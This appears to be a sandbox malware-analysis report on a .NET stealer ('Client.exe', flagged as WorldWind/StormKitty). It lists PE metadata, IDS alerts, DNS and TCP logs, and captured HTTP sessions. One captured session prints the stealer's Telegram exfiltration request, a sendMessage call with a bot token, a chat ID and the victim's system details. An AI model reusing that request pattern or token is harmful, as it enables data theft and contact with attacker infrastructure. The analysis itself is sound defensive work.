                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0xBBAE67A1 [Sat Oct 12 02:06:25 2069 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x2bd140x57.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x596.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2e0000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000x29d740x29e00c5d4e9f2c4f6be878eaa89ba1e631133False0.46550839552238804data5.954110335488051IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0x2c0000x5960x6009ebffd15afcc38c13c6b979adaf8db7eFalse0.4134114583333333data4.029504312109572IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x2e0000xc0x2005c56169a77e18db360815ba3767c2c2dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0x2c0a00x30cdata0.4269230769230769
                                                      RT_MANIFEST0x2c3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                      DLLImport
                                                      mscoree.dll_CorExeMain
                                                      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                      2024-08-30T07:14:12.277282+0200TCP2031009ET MALWARE StormKitty Data Exfil via Telegram149714443192.168.2.6149.154.167.220
                                                      2024-08-30T07:14:12.277282+0200TCP2044766ET MALWARE WorldWind Stealer Checkin via Telegram (GET)149714443192.168.2.6149.154.167.220
                                                      2024-08-30T07:14:13.361241+0200TCP2803305ETPRO MALWARE Common Downloader Header Pattern H349715443192.168.2.6149.154.167.220
                                                      2024-08-30T07:14:17.099187+0200TCP2044557ET MALWARE WorldWind Stealer Sending System information via Telegram (POST)149721443192.168.2.6149.154.167.220
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 30, 2024 07:14:08.957392931 CEST4971180192.168.2.6104.16.185.241
                                                      Aug 30, 2024 07:14:08.962220907 CEST8049711104.16.185.241192.168.2.6
                                                      Aug 30, 2024 07:14:08.962532043 CEST4971180192.168.2.6104.16.185.241
                                                      Aug 30, 2024 07:14:08.962904930 CEST4971180192.168.2.6104.16.185.241
                                                      Aug 30, 2024 07:14:08.967777014 CEST8049711104.16.185.241192.168.2.6
                                                      Aug 30, 2024 07:14:09.410106897 CEST8049711104.16.185.241192.168.2.6
                                                      Aug 30, 2024 07:14:09.472414017 CEST49712443192.168.2.6172.67.196.114
                                                      Aug 30, 2024 07:14:09.472438097 CEST44349712172.67.196.114192.168.2.6
                                                      Aug 30, 2024 07:14:09.472500086 CEST49712443192.168.2.6172.67.196.114
                                                      Aug 30, 2024 07:14:09.483858109 CEST49712443192.168.2.6172.67.196.114
                                                      Aug 30, 2024 07:14:09.483872890 CEST44349712172.67.196.114192.168.2.6
                                                      Aug 30, 2024 07:14:09.556634903 CEST4971180192.168.2.6104.16.185.241
                                                      Aug 30, 2024 07:14:09.988013983 CEST44349712172.67.196.114192.168.2.6
                                                      Aug 30, 2024 07:14:09.988101006 CEST49712443192.168.2.6172.67.196.114
                                                      Aug 30, 2024 07:14:09.991990089 CEST49712443192.168.2.6172.67.196.114
                                                      Aug 30, 2024 07:14:09.992005110 CEST44349712172.67.196.114192.168.2.6
                                                      Aug 30, 2024 07:14:09.992261887 CEST44349712172.67.196.114192.168.2.6
                                                      Aug 30, 2024 07:14:10.034013987 CEST49712443192.168.2.6172.67.196.114
                                                      Aug 30, 2024 07:14:10.076513052 CEST44349712172.67.196.114192.168.2.6
                                                      Aug 30, 2024 07:14:11.155082941 CEST44349712172.67.196.114192.168.2.6
                                                      Aug 30, 2024 07:14:11.155150890 CEST44349712172.67.196.114192.168.2.6
                                                      Aug 30, 2024 07:14:11.155215979 CEST49712443192.168.2.6172.67.196.114
                                                      Aug 30, 2024 07:14:11.157165051 CEST49712443192.168.2.6172.67.196.114
                                                      Aug 30, 2024 07:14:11.159663916 CEST4971180192.168.2.6104.16.185.241
                                                      Aug 30, 2024 07:14:11.164851904 CEST8049711104.16.185.241192.168.2.6
                                                      Aug 30, 2024 07:14:11.164905071 CEST4971180192.168.2.6104.16.185.241
                                                      Aug 30, 2024 07:14:11.167866945 CEST49714443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:11.167910099 CEST44349714149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:11.167982101 CEST49714443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:11.168324947 CEST49714443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:11.168339014 CEST44349714149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:11.809101105 CEST44349714149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:11.809175968 CEST49714443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:11.810720921 CEST49714443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:11.810729027 CEST44349714149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:11.810981989 CEST44349714149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:11.812618017 CEST49714443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:11.812653065 CEST44349714149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:12.277314901 CEST44349714149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:12.277342081 CEST44349714149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:12.277399063 CEST44349714149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:12.277405977 CEST49714443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:12.277466059 CEST49714443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:12.278203011 CEST49714443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:12.284759998 CEST49715443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:12.284785986 CEST44349715149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:12.284986019 CEST49715443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:12.285264015 CEST49715443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:12.285279036 CEST44349715149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:12.897008896 CEST44349715149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:12.899463892 CEST49715443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:12.899488926 CEST44349715149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:13.361268044 CEST44349715149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:13.361349106 CEST44349715149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:13.361406088 CEST49715443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:13.369272947 CEST49715443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:13.845694065 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:13.845745087 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:13.845823050 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:13.847848892 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:13.847867012 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.485069990 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.487570047 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.487600088 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.797959089 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.802109003 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.802148104 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.803453922 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.803467035 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.803579092 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.803605080 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.803647995 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.803658962 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.803853989 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.803878069 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.803992987 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804011106 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804032087 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804054976 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804161072 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804177999 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804207087 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804220915 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804335117 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804352999 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804372072 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804380894 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804383039 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804392099 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804665089 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804687023 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804719925 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804738045 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804783106 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804796934 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.804847002 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.804860115 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:14.805051088 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:14.805054903 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:16.135950089 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:16.136038065 CEST44349716149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:16.136140108 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:16.137645960 CEST49716443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:16.139863968 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:16.139904976 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:16.140063047 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:16.140625954 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:16.140636921 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:16.790297031 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:16.800209999 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:16.800240993 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.097672939 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.098459959 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.098488092 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.098609924 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.098614931 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.098726988 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.098745108 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.098959923 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.098963976 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.098988056 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099001884 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099003077 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099026918 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099041939 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099109888 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099126101 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099129915 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099145889 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099229097 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099242926 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099246025 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099253893 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099272013 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099296093 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099328041 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099340916 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099459887 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099468946 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099478006 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.099493027 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.099577904 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.109415054 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.588478088 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.588613987 CEST44349721149.154.167.220192.168.2.6
                                                      Aug 30, 2024 07:14:17.588668108 CEST49721443192.168.2.6149.154.167.220
                                                      Aug 30, 2024 07:14:17.591398954 CEST49721443192.168.2.6149.154.167.220
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 30, 2024 07:14:08.881264925 CEST5896353192.168.2.61.1.1.1
                                                      Aug 30, 2024 07:14:08.890199900 CEST53589631.1.1.1192.168.2.6
                                                      Aug 30, 2024 07:14:08.945246935 CEST5338653192.168.2.61.1.1.1
                                                      Aug 30, 2024 07:14:08.952404976 CEST53533861.1.1.1192.168.2.6
                                                      Aug 30, 2024 07:14:09.462364912 CEST5276853192.168.2.61.1.1.1
                                                      Aug 30, 2024 07:14:09.471705914 CEST53527681.1.1.1192.168.2.6
                                                      Aug 30, 2024 07:14:11.160358906 CEST5655253192.168.2.61.1.1.1
                                                      Aug 30, 2024 07:14:11.167337894 CEST53565521.1.1.1192.168.2.6
                                                      Aug 30, 2024 07:14:40.591720104 CEST5354667162.159.36.2192.168.2.6
                                                      Aug 30, 2024 07:14:41.172399044 CEST53503681.1.1.1192.168.2.6
                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Aug 30, 2024 07:14:08.881264925 CEST192.168.2.61.1.1.10x3391Standard query (0)72.245.12.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                      Aug 30, 2024 07:14:08.945246935 CEST192.168.2.61.1.1.10xe88eStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                      Aug 30, 2024 07:14:09.462364912 CEST192.168.2.61.1.1.10x878cStandard query (0)api.mylnikov.orgA (IP address)IN (0x0001)false
                                                      Aug 30, 2024 07:14:11.160358906 CEST192.168.2.61.1.1.10x3290Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Aug 30, 2024 07:14:08.890199900 CEST1.1.1.1192.168.2.60x3391Name error (3)72.245.12.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                      Aug 30, 2024 07:14:08.952404976 CEST1.1.1.1192.168.2.60xe88eNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                      Aug 30, 2024 07:14:08.952404976 CEST1.1.1.1192.168.2.60xe88eNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                      Aug 30, 2024 07:14:09.471705914 CEST1.1.1.1192.168.2.60x878cNo error (0)api.mylnikov.org172.67.196.114A (IP address)IN (0x0001)false
                                                      Aug 30, 2024 07:14:09.471705914 CEST1.1.1.1192.168.2.60x878cNo error (0)api.mylnikov.org104.21.44.66A (IP address)IN (0x0001)false
                                                      Aug 30, 2024 07:14:11.167337894 CEST1.1.1.1192.168.2.60x3290No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                      • api.mylnikov.org
                                                      • api.telegram.org
                                                      • icanhazip.com
                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649711104.16.185.241806940C:\Users\user\Desktop\Client.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 30, 2024 07:14:08.962904930 CEST63OUTGET / HTTP/1.1
                                                      Host: icanhazip.com
                                                      Connection: Keep-Alive
                                                      Aug 30, 2024 07:14:09.410106897 CEST534INHTTP/1.1 200 OK
                                                      Date: Fri, 30 Aug 2024 05:14:09 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 12
                                                      Connection: keep-alive
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET
                                                      Set-Cookie: __cf_bm=oaaHnqx2Z8keEZfNSGRuZyh3tubqd1j.VcmwFNv_sZo-1724994849-1.0.1.1-TRefTfZuNgq_wNfuhp68yJr1lu5MqKJXHBqPBGnMH.tbCSNDHlc6wXgIfkITh4Z2D5cMNwLAZbwtYMR51QvWww; path=/; expires=Fri, 30-Aug-24 05:44:09 GMT; domain=.icanhazip.com; HttpOnly
                                                      Server: cloudflare
                                                      CF-RAY: 8bb24bb089074289-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                      Data Ascii: 8.46.123.33


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649712172.67.196.1144436940C:\Users\user\Desktop\Client.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-30 05:14:10 UTC112OUTGET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
                                                      Host: api.mylnikov.org
                                                      Connection: Keep-Alive
                                                      2024-08-30 05:14:11 UTC777INHTTP/1.1 200 OK
                                                      Date: Fri, 30 Aug 2024 05:14:11 GMT
                                                      Content-Type: application/json; charset=utf8
                                                      Content-Length: 88
                                                      Connection: close
                                                      Access-Control-Allow-Origin: *
                                                      Cache-Control: max-age=2678400
                                                      CF-Cache-Status: MISS
                                                      Last-Modified: Fri, 30 Aug 2024 05:14:11 GMT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=krVpqYsT6V3vzt9ak4GH2eu1KWcUMVL0CxTXQZOFZHPbzUIPW2ybFNhvlChmAsSVr3GQr1L6%2BtUx0GI3WxfntOLf7YegSR8Hxvs1eShavNVD9%2Bh1dLQ7gNIc81XmyQOVWoPt"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Strict-Transport-Security: max-age=0; preload
                                                      X-Content-Type-Options: nosniff
                                                      Server: cloudflare
                                                      CF-RAY: 8bb24bb50876429b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-08-30 05:14:11 UTC88INData Raw: 7b 22 72 65 73 75 6c 74 22 3a 34 30 34 2c 20 22 64 61 74 61 22 3a 7b 7d 2c 20 22 6d 65 73 73 61 67 65 22 3a 36 2c 20 22 64 65 73 63 22 3a 22 4f 62 6a 65 63 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 22 2c 20 22 74 69 6d 65 22 3a 31 37 32 34 39 39 34 38 35 30 7d
                                                      Data Ascii: {"result":404, "data":{}, "message":6, "desc":"Object was not found", "time":1724994850}


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.649714149.154.167.2204436940C:\Users\user\Desktop\Client.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-30 05:14:11 UTC1761OUTGET /bot5344934242:AAF3rLeFDCGd-IVKJG_PU99MSQjdKyNgeR0/sendMessage?chat_id=1619136628&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Stealer%202.0.4%20-%20Results:*%0ADate:%202024-08-30%201:14:00%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20849224%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20MKX85XX%0ARAM:%204095MB%0AHWID:%20B98BC19D7D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%2 [TRUNCATED]
                                                      Host: api.telegram.org
                                                      Connection: Keep-Alive
                                                      2024-08-30 05:14:12 UTC389INHTTP/1.1 200 OK
                                                      Server: nginx/1.18.0
                                                      Date: Fri, 30 Aug 2024 05:14:12 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 2076
                                                      Connection: close
                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                      2024-08-30 05:14:12 UTC2076INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 38 31 30 39 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 34 34 39 33 34 32 34 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 48 65 79 20 73 6b 69 64 2c 20 61 64 64 20 6d 65 20 6f 6e 20 64 69 73 63 6f 72 64 3a 20 5f 6d 61 72 76 69 6d 5f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 48 61 63 6b 69 6e 47 75 73 65 72 73 5f 64 61 74 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 31 39 31 33 36 36 32 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 72 59 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 75 6e 6e 79 5f 48 6f 6f 64 61 5f 31 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d
